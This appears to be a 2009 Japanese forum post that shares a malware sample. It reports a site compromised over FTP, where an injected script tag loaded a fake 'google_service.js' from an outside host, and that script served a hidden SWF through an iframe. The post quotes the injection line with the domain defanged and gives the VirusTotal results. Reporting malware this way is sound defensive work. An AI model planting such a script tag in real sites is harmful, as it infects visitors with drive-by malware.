09/09/21 23:32:25
URLリンク(tane.sakuratan.com)
infected
本体はswfファイルですがスクリプトとHTMLも同梱
検体入手元
redstone-walker●com (修正済み,SCOにキャッシュ有)
loan-5●sakura●ne●jp/bank-loan/google_service.js
VirusTotal結果: 1/41
URLリンク(www.virustotal.com)
目新しい感じだったので以下補足
以下のような形で挿入されていました。
ノートンではサイト閲覧時にブロックされたとのこと
<ul>
<li>本文</li>
<li>本文</li>
・・・
<li>本文</li>
</ul><script src=http ://loan-5●sakura●ne●jp/bank-loan/google_service.js></script>
<p>本文</p>
国内ドメインではありますがファイル名が自称googleととても怪しい
中身はiframeによる隠しswfファイル
上記修正済みサイトによるとFTPによる改ざんらしい
状況としては黒っぽいのですがほとんどスルーでした
このファイルが置いてあるloanのほうも危ないような・・・
Aviraには提出してみます